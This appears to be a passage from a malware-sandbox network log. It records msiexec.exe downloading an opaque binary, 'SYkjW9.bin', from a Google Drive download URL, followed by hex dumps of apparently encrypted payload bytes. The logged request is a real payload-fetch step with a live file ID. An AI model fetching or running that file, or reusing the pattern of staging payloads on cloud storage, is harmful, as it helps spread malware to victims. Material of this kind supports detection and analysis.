Timestamp | Bytes transferred | Direction | Data
2024-10-22 14:11:54 UTC | 258 bytes | OUT
GET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
2024-10-22 14:11:57 UTC | 4890 bytes | IN
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="SYkjW9.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 279616
Last-Modified: Sun, 20 Oct 2024 23:54:48 GMT
X-GUploader-UploadID: AHmUCY3SYVRJV4kqZLRBJAvuzolncxsl_zKDys3Mq66iRV-fuSV6Ryp1RT2v6qZC1iq1yZCsF5g4CS8B2Q
Date: Tue, 22 Oct 2024 14:11:57 GMT
Expires: Tue, 22 Oct 2024 14:11:57 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=epXt+A==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-10-22 14:11:57 UTC | 4890 bytes | IN
Data Raw: f4 73 a0 cc 56 d5 cf a6 de f9 b6 f7 73 b6 43 50 ef 5d dc 77 ad cc 5b 22 0c 97 cb 3d b6 89 cb af 20 10 6b 95 ad f2 f7 7f 20 0b ce 30 2c 23 c7 ff 81 1e 42 97 5f 49 fd 6a 07 b6 2c e6 88 d1 0c 67 cc dc 40 c6 50 bc 6b 23 3f d5 14 32 fa 7b 05 57 b0 2c f8 52 03 01 54 6b b3 e9 d7 99 f2 d0 6d 39 71 f3 63 04 aa b2 07 9e 1f 59 17 9e 86 b9 f4 ee 97 f3 1f 9a ea bf b1 2b 0a 57 07 cb 63 72 02 42 77 08 cc 09 ec 81 e5 34 10 9e ea 77 22 83 df ea f6 d3 e8 06 14 b6 9e 46 b6 0d 8c 89 ab f9 ae 4f a7 40 1c 7a 15 d3 bc bd 68 ef 1d dc cf 82 b7 79 3e 95 71 d3 00 d6 e1 35 6d 29 bf 56 f7 35 2b d0 7e 8b 20 70 b8 2a 20 27 a9 f2 0f e1 f6 95 41 79 d9 29 11 9a a5 50 72 3e a2 da 0e e0 e0 e6 56 9d c0 8d e0 26 17 83 29 cc 2b 7b a1 28 aa 82 39 3b 03 c2 22 b0 dc c3 8e fa f3 9d 5a e0 7c 88 4c
Data Ascii: sVsCP]w["= k 0,#B_Ij,g@Pk#?2{W,RTkm9qcY+WcrBw4w"FO@zhy>q5m)V5+~ p* 'Ay)Pr>V&)+{(9;"Z|L
                                                                                                                          2024-10-22 14:11:57 UTC4890INData Raw: 80 19 a0 83 8c 25 03 c7 5b ec d1 8b 98 39 8d 74 58 24 6c 1a 0d 90 6a b7 2d 42 19 2a 90 a3 83 f2 2b b0 64 b6 0c 66 1f 69 6c 99 05 ec a2 8a fd d6 89 1f 40 88 2d 9e 95 9c cf bc c2 40 86 81 b5 6f e4 90 fc d9 2d 5a d2 d5 45 b2 41 2e 42 37 d5 f2 b0 fc b9 a4 23 fc de a7 09 2b f2 7f 2d 15 3e 3c e7 bc 89 5a 6d 09 72 47 fb db a5 77 da 34 3e 91 28 c8 78 d4 43 24 ee 22 89 06 b3 f7 0d d5 ef c8 62 94 63 e1 b8 c4 8f c0 0c 50 63 3d 13 d3 bc 12 22 f4 f5 3f a8 fa 25 9a 32 4b e6 bd 0a cf c2 9d 0b 56 5d 8e 32 ba 09 09 91 91 bb 34 97 c5 2c 78 25 88 bd bc 79 85 ea 08 5c 7b 12 e0 71 f6 f6 3e 3b 92 99 79 e8 a7 44 63 75 2f 4f 06 3f 16 1c 38 60 af 79 c1 92 1e fd d9 bc 3f ae 1e a1 12 69 d1 e5 25 6e a4 4a 92 65 ac b1 5b 6d 9b 14 60 1e f6 00 cd 9d ea 5d 10 40 2e df 72 6d 3f 93 36 76
                                                                                                                          Data Ascii: %[9tX$lj-B*+dfil@-@o-ZEA.B7#+-><ZmrGw4>(xC$"bcPc="?%2KV]24,x%y\{q>;yDcu/O?8`y?i%nJe[m`]@.rm?6v
                                                                                                                          2024-10-22 14:11:57 UTC29INData Raw: 4f f3 0e bb 02 e4 94 24 e6 ec 05 b7 fa 70 47 93 56 5f b6 e8 4e 5c 7f 5d c5 64 40 2f f6
                                                                                                                          Data Ascii: O$pGV_N\]d@/
                                                                                                                          2024-10-22 14:11:57 UTC1322INData Raw: f8 62 99 7e d3 ad 1d e0 0b 05 a0 3a 00 83 01 7d d8 90 90 65 31 81 20 ed f7 de 77 80 ee ea 08 f4 c0 c7 3c 97 77 f9 c9 21 44 bf 3e 68 76 2a 0c 53 aa b0 96 00 53 53 a4 34 21 33 96 4e 3b bd 28 8e c8 d6 ee be 1e 09 19 2b d4 b2 d4 3d 87 4c 6c 36 7e 3e e1 a3 8c f4 27 e7 00 95 fd 19 e3 82 5d ba 5b 39 57 cd 78 0a 82 68 32 8f 97 5b 8b 7d 50 88 e3 e4 b4 4a 7b c4 61 e8 5b b4 43 8d 3d 16 86 fe 71 d4 55 7e 8b ee 6c 75 48 87 36 6d 96 7f 02 b1 5b ef 07 e1 b4 5b 5b f3 58 0f 6e 4b 6f 74 27 dd 71 b4 8f 70 42 07 bc 2c cb de 1a da 59 c4 bc b3 01 2c 02 0e c5 17 14 66 b2 ae 63 f5 67 7c cc 14 cf 91 db 54 49 45 5c 01 2c b4 e4 d7 83 5f ba f6 7d e5 f4 85 b3 77 e1 98 5a 09 e1 ce e6 26 db 40 a0 05 11 6c a7 ad 2f ea 76 c4 04 6b 5d 18 a2 c6 f9 6f 73 ca cd 7d 25 e2 d8 83 bc a5 eb e6 40
                                                                                                                          Data Ascii: b~:}e1 w<w!D>hv*SSS4!3N;(+=Ll6~>'][9Wxh2[}PJ{a[C=qU~luH6m[[[XnKot'qpB,Y,fcg|TIE\,_}wZ&@l/vk]os}%@
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: 68 fb f0 04 dd 82 20 8e 0a c9 b3 d5 2a 5d b0 72 cc e1 ce 00 2d 6c 2c 8e b8 8b 74 bc c2 3e 0d 90 44 b1 26 96 2c d1 a2 45 9c 98 6a b2 57 d2 e0 8f 47 6e 95 de e1 2e ed 57 60 27 5d 29 f4 13 3e eb 91 cb 1f e4 6e 1b 28 51 d3 57 6e fb 67 24 16 f7 e6 d3 c2 f9 30 62 07 1d a7 74 b3 cd e1 a7 a9 c8 14 50 11 f5 26 cc 02 e4 9e 5a d4 92 3a b3 88 23 54 b2 54 5b 8d 69 3e 22 6a 4b 3b 61 7b 60 e7 fe 51 4b 5e ad ed 63 cf 0f 2d 9a 48 31 87 01 d3 de 9d 39 51 31 8b 3c 00 d5 cd 58 f3 e9 d3 32 2b c0 c7 3c 83 f7 c8 f4 21 40 cb 1a aa 76 5a 10 53 ea b0 96 00 45 de 67 27 05 28 a1 6a 76 a8 db f4 c8 d6 eb e8 cb 7b 7d 2e bb 06 76 18 9a 64 c9 3e 11 f1 43 86 9e f8 64 e8 00 e1 30 fa fa fc 6f ba 4a 35 87 62 72 78 50 4f 86 ff 35 74 e2 a3 6a 88 93 c8 4d 6f 67 bc be 20 5b c4 eb a5 59 1e 9b 79
                                                                                                                          Data Ascii: h *]r-l,t>D&,EjWGn.W`'])>n(QWng$0btP&Z:#TT[i>"jK;a{`QK^c-H19Q1<X2+<!@vZSEg'(jv{}.vd>Cd0oJ5brxPO5tjMog [Yy
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: 4b 0d c9 5c 7b 00 3f bd 0c da ae 6c 0e 32 79 69 ee 0f d6 ae a6 ee 31 40 34 73 76 26 1a 00 53 53 76 c5 e0 d3 a6 45 12 61 fe 9e c5 7d 19 b1 83 e0 c4 3e 84 2f b1 2b 89 38 3c a2 39 3d ac 40 22 2c 3d 72 03 2c 63 cf 20 79 89 43 03 cb 9d 48 ab 11 bd 99 d5 3b 51 6c 69 d0 93 7a 27 e6 1c 8e ac a2 47 74 b6 a7 62 1c 98 30 98 07 8d a5 ef 99 45 9d b9 0f 7c b3 c0 ea 90 28 4b 82 fc 55 3f e5 4c c4 6d 8b 5b 8a 16 3e 8a 35 81 c9 9a 56 11 28 7d 15 72 74 8f 5c f9 06 a2 6c cf b7 f9 3a 7b 1e 3f 99 3e c5 cd eb 73 a9 e8 14 5c 6f c0 0e bb 06 96 c3 58 d4 9c 13 9b 09 27 45 99 30 b7 9f 7a 45 4d 7e 72 f0 64 53 29 99 d5 5b 5a 78 fb 46 63 cf 01 16 a8 36 07 81 01 09 bc 9a 00 65 41 9d 1e 92 f6 cd 7a 87 17 d2 2b f8 d1 ca 05 5a 89 ff f4 37 6c cf 4d a8 7c 2a 26 7b 67 b0 96 22 24 20 66 3e 21
                                                                                                                          Data Ascii: K\{?l2yi1@4sv&SSvEa}>/+8<9=@",=r,c yCH;Qliz'Gtb0E|(KU?Lm[>5V(}rt\l:{?>s\oX'E0zEM~rdS)[ZxFc6eAz+Z7lM|*&{g"$ f>!
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: 6c bd 8b 73 7c 4e c6 86 28 c5 23 c8 2c b4 c7 6a 45 d9 8f ee 30 df ed ec fb be 79 21 57 1b 1d e7 14 5b 44 3e 79 5b f1 b8 b3 b5 f8 95 3b 69 43 90 0a 64 82 53 dc 88 c1 19 93 0e a1 4a 37 57 cb 4d 9c 77 af fb a6 3b a7 4b 56 20 5c 7b 0c 43 03 1d dc cb cf 16 27 73 08 c1 3b 05 ae ac 9a 7a 3e 08 77 5e 68 69 c9 59 2d 63 d6 e8 a9 bf 0f 12 65 86 6b d3 69 7d 8f 11 61 c4 34 fa ba 4f 2a 9b 3d 2d a3 67 b1 ad 48 45 2c 4c 72 03 2c 63 c7 75 30 89 52 0f a3 b1 82 ab 15 c4 25 d5 2a 53 7d ea d0 93 74 0f 05 46 8e a6 c7 96 f9 f6 ad 62 0c b5 58 d0 0b 98 a1 e1 00 60 8a 95 c8 c0 b3 ca 42 da fd 39 fc f9 55 5e 4f 78 db 7c 7d 5b 8a 18 9c be 29 9c a4 95 56 6b 8a 70 6a 0c 68 89 5c 23 79 69 44 fb bd 5b 15 74 66 07 a5 5c b5 6f c9 d8 a9 e8 1e 33 4d f5 0e b1 0f ec 9d d4 bd 86 6a 0d 88 27 4f
                                                                                                                          Data Ascii: ls|N(#,jE0y!W[D>y[;iCdSJ7WMw;KV \{C's;z>w^hiY-ceki}a4O*=-gHE,Lr,cu0R%*S}tFbX`B9U^Ox|}[)Vkpjh\#yiD[tf\o3Mj'O
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: a4 44 13 eb 7b cb 14 f6 d4 c3 8c e1 34 96 48 3f d3 1d 7d 24 fc e7 76 f7 7c 1f 48 aa ca 22 67 d1 20 31 19 5a 65 79 a2 db d2 45 c1 37 12 5b 84 8b 8d d5 ec 21 31 89 9d ba a2 7c f2 5a f8 c1 a7 a6 53 08 ec fd 01 63 b6 39 bc dd b7 7c 4e c8 32 f3 de 5b 12 04 16 b0 42 05 a7 bc e8 92 fe 86 c5 bf be 09 33 dd bf 07 95 16 5f ba 4f d0 79 d3 87 3f f5 f8 81 ea 19 55 e2 81 5c af 23 7e a7 a4 73 37 0e d1 57 18 71 d3 3f 1f 47 b9 f5 40 1e be 67 ca 24 5c 71 a8 09 a0 6f b8 d3 bd 7e 90 5b 0d e9 60 0f 0c 8e 91 31 3e 02 60 68 50 a3 dc 53 23 02 c9 e8 ad 93 6d 5b 65 8c c3 b5 c5 7b a7 db 49 86 3e 8e 3f 5e 34 8b 25 05 ef 15 31 bb 48 e8 c2 f6 72 03 03 4b fb 0b 72 83 41 14 dd da e0 ab 11 bd 47 d5 2a 59 12 57 ae a7 7e 0f 29 6e d9 a4 cd fb 62 9e 2c 62 0d 9a 58 5c 06 9e 81 80 82 7c 4e bd
                                                                                                                          Data Ascii: D{4H?}$v|H"g 1ZeyE7[!1|ZSc9|N2[B3_Oy?U\#~s7Wq?G@g$\qo~[`1>`hPS#m[e{I>?^4%1HrKrAG*YW~)nb,bX\|N
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: 5c 32 e0 32 b3 6c a3 96 8e a1 b9 16 c9 2c 70 66 ea b4 d3 72 85 ed 05 33 c1 cc f3 5e d9 ad 59 3b 98 80 12 80 8f 26 69 79 25 e1 0c 39 16 16 2b 64 af 16 f7 9a 09 8a c1 eb 3d a4 7d b2 3a f9 d4 96 44 78 5a 41 92 66 ac b2 60 c8 f5 14 60 6a d9 de c3 99 89 6a 3e 48 4f cf 35 ed 3f 93 36 60 09 77 0c 4e 83 0f 1b 57 d0 20 31 0f 66 ed 7f 9f d1 d2 63 b2 fb 12 5b a6 d4 4c d5 e6 2b 2d 77 1f ba a2 77 c4 4b 9b 7b d2 9c 23 20 a9 8e c2 65 14 16 c4 67 f2 7c 44 cc 81 d1 a9 ec ce 15 1c be 57 45 a7 b8 81 f6 db 9f b1 f9 af 0e 45 f5 8a 1d 97 36 f9 ba 3f 78 2e 68 8c b2 c5 d0 da eb 3c 49 ff cc 4c af 59 dc 93 b4 46 0e 4e d1 5d bb 71 dd 3f b1 44 b9 f5 40 1e b0 67 ca 24 5c 71 a8 09 a2 6f a2 ce bd 7e 90 56 61 97 58 05 ae a2 46 14 24 7a 48 75 22 19 6b 76 48 02 f6 e8 ad 93 e7 37 79 fe f1
                                                                                                                          Data Ascii: \22l,pfr3^Y;&iy%9+d=}:DxZAf``jj>HO5?6`wNW 1fc[L+-wwK{# eg|DWEE6?x.h<ILYFN]q?D@g$\qo~VaXF$zHu"kvH7y
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: 5d 7f 2d 1f 54 18 ff ce f9 55 6d 79 d0 62 e2 a5 9d 77 da 30 9d b4 32 ba 94 d6 43 54 94 06 92 78 83 f7 0d d1 08 ed 7e e7 40 c7 bb b4 9c e8 79 50 70 37 7c 9e bc 12 00 84 d7 24 2f b1 22 b2 69 6e f0 c5 43 b7 9e ed a9 79 25 c2 86 ba 03 03 34 ab b3 cb b6 ca 2c 09 e8 c8 a4 c2 4b 85 ed 0b 91 38 08 92 40 f2 99 29 99 ba e6 16 80 ad 57 4a 6f 07 4a 6f 3f 1c 16 0b 64 a3 68 c5 b2 7e 8e b3 b6 3f a4 73 9b 12 78 d0 87 6c 1c ce 57 81 13 c3 a8 59 02 f3 3c 29 14 f6 d4 d2 be 85 1b 3c 48 3b f1 23 6c 3f 95 3c a8 e7 53 37 7c 92 09 28 74 f5 20 19 6d 72 13 73 7c d1 d2 65 c1 45 25 5b ac f8 ff 82 e4 21 5d 12 f5 3b a2 7d dd 5a 74 7d bf 83 32 05 81 a1 1c e8 54 1c ab a2 d7 6a 3c e0 86 d6 b6 8b eb 02 3e 74 6a 45 ad 1e cb 28 a9 e1 b4 f9 ce ab 12 66 e4 25 e7 1e 49 18 1a 68 2e f3 9f b2 c5
                                                                                                                          Data Ascii: ]-TUmybw02CTx~@yPp7|$/"inCy%4,K8@)WJoJo?dh~?sxlWY<)<H;#l?<S7|(t mrs|eE%[!];}Zt}2Tj<>tjE(f%Ih.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.6  49989        142.250.185.65  443               3212  C:\Windows\SysWOW64\msiexec.exe

Timestamp  Bytes transferred  Direction  Data

2024-10-22 14:11:54 UTC  258 bytes  OUT
  GET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive

2024-10-22 14:11:59 UTC  4890 bytes  IN
  HTTP/1.1 200 OK
  Content-Type: application/octet-stream
  Content-Security-Policy: sandbox
  Content-Security-Policy: default-src 'none'
  Content-Security-Policy: frame-ancestors 'none'
  X-Content-Security-Policy: sandbox
  Cross-Origin-Opener-Policy: same-origin
  Cross-Origin-Embedder-Policy: require-corp
  Cross-Origin-Resource-Policy: same-site
  X-Content-Type-Options: nosniff
  Content-Disposition: attachment; filename="SYkjW9.bin"
  Access-Control-Allow-Origin: *
  Access-Control-Allow-Credentials: false
  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
  Accept-Ranges: bytes
  Content-Length: 279616
  Last-Modified: Sun, 20 Oct 2024 23:54:48 GMT
  X-GUploader-UploadID: AHmUCY3hAvVHC8g6t9F1rgBz07yA8fP7bx1CKKPP1ExAr4kX-Mxqr3GtEDagf_YVfLF3Ri7cPu4tXb5H4g
  Date: Tue, 22 Oct 2024 14:11:59 GMT
  Expires: Tue, 22 Oct 2024 14:11:59 GMT
  Cache-Control: private, max-age=0
  X-Goog-Hash: crc32c=epXt+A==
  Server: UploadServer
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Connection: close

2024-10-22 14:11:59 UTC  4890 bytes  IN
  Data Raw: f4 73 a0 cc 56 d5 cf a6 de f9 b6 f7 73 b6 43 50 ef 5d dc 77 ad cc 5b 22 0c 97 cb 3d b6 89 cb af 20 10 6b 95 ad f2 f7 7f 20 0b ce 30 2c 23 c7 ff 81 1e 42 97 5f 49 fd 6a 07 b6 2c e6 88 d1 0c 67 cc dc 40 c6 50 bc 6b 23 3f d5 14 32 fa 7b 05 57 b0 2c f8 52 03 01 54 6b b3 e9 d7 99 f2 d0 6d 39 71 f3 63 04 aa b2 07 9e 1f 59 17 9e 86 b9 f4 ee 97 f3 1f 9a ea bf b1 2b 0a 57 07 cb 63 72 02 42 77 08 cc 09 ec 81 e5 34 10 9e ea 77 22 83 df ea f6 d3 e8 06 14 b6 9e 46 b6 0d 8c 89 ab f9 ae 4f a7 40 1c 7a 15 d3 bc bd 68 ef 1d dc cf 82 b7 79 3e 95 71 d3 00 d6 e1 35 6d 29 bf 56 f7 35 2b d0 7e 8b 20 70 b8 2a 20 27 a9 f2 0f e1 f6 95 41 79 d9 29 11 9a a5 50 72 3e a2 da 0e e0 e0 e6 56 9d c0 8d e0 26 17 83 29 cc 2b 7b a1 28 aa 82 39 3b 03 c2 22 b0 dc c3 8e fa f3 9d 5a e0 7c 88 4c
  Data Ascii: sVsCP]w["= k 0,#B_Ij,g@Pk#?2{W,RTkm9qcY+WcrBw4w"FO@zhy>q5m)V5+~ p* 'Ay)Pr>V&)+{(9;"Z|L

2024-10-22 14:11:59 UTC  4890 bytes  IN
  Data Raw: 80 19 a0 83 8c 25 03 c7 5b ec d1 8b 98 39 8d 74 58 24 6c 1a 0d 90 6a b7 2d 42 19 2a 90 a3 83 f2 2b b0 64 b6 0c 66 1f 69 6c 99 05 ec a2 8a fd d6 89 1f 40 88 2d 9e 95 9c cf bc c2 40 86 81 b5 6f e4 90 fc d9 2d 5a d2 d5 45 b2 41 2e 42 37 d5 f2 b0 fc b9 a4 23 fc de a7 09 2b f2 7f 2d 15 3e 3c e7 bc 89 5a 6d 09 72 47 fb db a5 77 da 34 3e 91 28 c8 78 d4 43 24 ee 22 89 06 b3 f7 0d d5 ef c8 62 94 63 e1 b8 c4 8f c0 0c 50 63 3d 13 d3 bc 12 22 f4 f5 3f a8 fa 25 9a 32 4b e6 bd 0a cf c2 9d 0b 56 5d 8e 32 ba 09 09 91 91 bb 34 97 c5 2c 78 25 88 bd bc 79 85 ea 08 5c 7b 12 e0 71 f6 f6 3e 3b 92 99 79 e8 a7 44 63 75 2f 4f 06 3f 16 1c 38 60 af 79 c1 92 1e fd d9 bc 3f ae 1e a1 12 69 d1 e5 25 6e a4 4a 92 65 ac b1 5b 6d 9b 14 60 1e f6 00 cd 9d ea 5d 10 40 2e df 72 6d 3f 93 36 76
  Data Ascii: %[9tX$lj-B*+dfil@-@o-ZEA.B7#+-><ZmrGw4>(xC$"bcPc="?%2KV]24,x%y\{q>;yDcu/O?8`y?i%nJe[m`]@.rm?6v

2024-10-22 14:11:59 UTC  27 bytes  IN
  Data Raw: 4f f3 0e bb 02 e4 94 24 e6 ec 05 b7 fa 70 47 93 56 5f b6 e8 4e 5c 7f 5d c5 64 40
  Data Ascii: O$pGV_N\]d@

2024-10-22 14:11:59 UTC  1324 bytes  IN
  Data Raw: 2f f6 f8 62 99 7e d3 ad 1d e0 0b 05 a0 3a 00 83 01 7d d8 90 90 65 31 81 20 ed f7 de 77 80 ee ea 08 f4 c0 c7 3c 97 77 f9 c9 21 44 bf 3e 68 76 2a 0c 53 aa b0 96 00 53 53 a4 34 21 33 96 4e 3b bd 28 8e c8 d6 ee be 1e 09 19 2b d4 b2 d4 3d 87 4c 6c 36 7e 3e e1 a3 8c f4 27 e7 00 95 fd 19 e3 82 5d ba 5b 39 57 cd 78 0a 82 68 32 8f 97 5b 8b 7d 50 88 e3 e4 b4 4a 7b c4 61 e8 5b b4 43 8d 3d 16 86 fe 71 d4 55 7e 8b ee 6c 75 48 87 36 6d 96 7f 02 b1 5b ef 07 e1 b4 5b 5b f3 58 0f 6e 4b 6f 74 27 dd 71 b4 8f 70 42 07 bc 2c cb de 1a da 59 c4 bc b3 01 2c 02 0e c5 17 14 66 b2 ae 63 f5 67 7c cc 14 cf 91 db 54 49 45 5c 01 2c b4 e4 d7 83 5f ba f6 7d e5 f4 85 b3 77 e1 98 5a 09 e1 ce e6 26 db 40 a0 05 11 6c a7 ad 2f ea 76 c4 04 6b 5d 18 a2 c6 f9 6f 73 ca cd 7d 25 e2 d8 83 bc a5 eb
  Data Ascii: /b~:}e1 w<w!D>hv*SSS4!3N;(+=Ll6~>'][9Wxh2[}PJ{a[C=qU~luH6m[[[XnKot'qpB,Y,fcg|TIE\,_}wZ&@l/vk]os}%

2024-10-22 14:11:59 UTC  1378 bytes  IN
  Data Raw: 68 fb f0 04 dd 82 20 8e 0a c9 b3 d5 2a 5d b0 72 cc e1 ce 00 2d 6c 2c 8e b8 8b 74 bc c2 3e 0d 90 44 b1 26 96 2c d1 a2 45 9c 98 6a b2 57 d2 e0 8f 47 6e 95 de e1 2e ed 57 60 27 5d 29 f4 13 3e eb 91 cb 1f e4 6e 1b 28 51 d3 57 6e fb 67 24 16 f7 e6 d3 c2 f9 30 62 07 1d a7 74 b3 cd e1 a7 a9 c8 14 50 11 f5 26 cc 02 e4 9e 5a d4 92 3a b3 88 23 54 b2 54 5b 8d 69 3e 22 6a 4b 3b 61 7b 60 e7 fe 51 4b 5e ad ed 63 cf 0f 2d 9a 48 31 87 01 d3 de 9d 39 51 31 8b 3c 00 d5 cd 58 f3 e9 d3 32 2b c0 c7 3c 83 f7 c8 f4 21 40 cb 1a aa 76 5a 10 53 ea b0 96 00 45 de 67 27 05 28 a1 6a 76 a8 db f4 c8 d6 eb e8 cb 7b 7d 2e bb 06 76 18 9a 64 c9 3e 11 f1 43 86 9e f8 64 e8 00 e1 30 fa fa fc 6f ba 4a 35 87 62 72 78 50 4f 86 ff 35 74 e2 a3 6a 88 93 c8 4d 6f 67 bc be 20 5b c4 eb a5 59 1e 9b 79
  Data Ascii: h *]r-l,t>D&,EjWGn.W`'])>n(QWng$0btP&Z:#TT[i>"jK;a{`QK^c-H19Q1<X2+<!@vZSEg'(jv{}.vd>Cd0oJ5brxPO5tjMog [Yy

2024-10-22 14:11:59 UTC  1378 bytes  IN
  Data Raw: 4b 0d c9 5c 7b 00 3f bd 0c da ae 6c 0e 32 79 69 ee 0f d6 ae a6 ee 31 40 34 73 76 26 1a 00 53 53 76 c5 e0 d3 a6 45 12 61 fe 9e c5 7d 19 b1 83 e0 c4 3e 84 2f b1 2b 89 38 3c a2 39 3d ac 40 22 2c 3d 72 03 2c 63 cf 20 79 89 43 03 cb 9d 48 ab 11 bd 99 d5 3b 51 6c 69 d0 93 7a 27 e6 1c 8e ac a2 47 74 b6 a7 62 1c 98 30 98 07 8d a5 ef 99 45 9d b9 0f 7c b3 c0 ea 90 28 4b 82 fc 55 3f e5 4c c4 6d 8b 5b 8a 16 3e 8a 35 81 c9 9a 56 11 28 7d 15 72 74 8f 5c f9 06 a2 6c cf b7 f9 3a 7b 1e 3f 99 3e c5 cd eb 73 a9 e8 14 5c 6f c0 0e bb 06 96 c3 58 d4 9c 13 9b 09 27 45 99 30 b7 9f 7a 45 4d 7e 72 f0 64 53 29 99 d5 5b 5a 78 fb 46 63 cf 01 16 a8 36 07 81 01 09 bc 9a 00 65 41 9d 1e 92 f6 cd 7a 87 17 d2 2b f8 d1 ca 05 5a 89 ff f4 37 6c cf 4d a8 7c 2a 26 7b 67 b0 96 22 24 20 66 3e 21
  Data Ascii: K\{?l2yi1@4sv&SSvEa}>/+8<9=@",=r,c yCH;Qliz'Gtb0E|(KU?Lm[>5V(}rt\l:{?>s\oX'E0zEM~rdS)[ZxFc6eAz+Z7lM|*&{g"$ f>!

2024-10-22 14:11:59 UTC  1378 bytes  IN
  Data Raw: 6c bd 8b 73 7c 4e c6 86 28 c5 23 c8 2c b4 c7 6a 45 d9 8f ee 30 df ed ec fb be 79 21 57 1b 1d e7 14 5b 44 3e 79 5b f1 b8 b3 b5 f8 95 3b 69 43 90 0a 64 82 53 dc 88 c1 19 93 0e a1 4a 37 57 cb 4d 9c 77 af fb a6 3b a7 4b 56 20 5c 7b 0c 43 03 1d dc cb cf 16 27 73 08 c1 3b 05 ae ac 9a 7a 3e 08 77 5e 68 69 c9 59 2d 63 d6 e8 a9 bf 0f 12 65 86 6b d3 69 7d 8f 11 61 c4 34 fa ba 4f 2a 9b 3d 2d a3 67 b1 ad 48 45 2c 4c 72 03 2c 63 c7 75 30 89 52 0f a3 b1 82 ab 15 c4 25 d5 2a 53 7d ea d0 93 74 0f 05 46 8e a6 c7 96 f9 f6 ad 62 0c b5 58 d0 0b 98 a1 e1 00 60 8a 95 c8 c0 b3 ca 42 da fd 39 fc f9 55 5e 4f 78 db 7c 7d 5b 8a 18 9c be 29 9c a4 95 56 6b 8a 70 6a 0c 68 89 5c 23 79 69 44 fb bd 5b 15 74 66 07 a5 5c b5 6f c9 d8 a9 e8 1e 33 4d f5 0e b1 0f ec 9d d4 bd 86 6a 0d 88 27 4f
  Data Ascii: ls|N(#,jE0y!W[D>y[;iCdSJ7WMw;KV \{C's;z>w^hiY-ceki}a4O*=-gHE,Lr,cu0R%*S}tFbX`B9U^Ox|}[)Vkpjh\#yiD[tf\o3Mj'O

2024-10-22 14:11:59 UTC  1378 bytes  IN
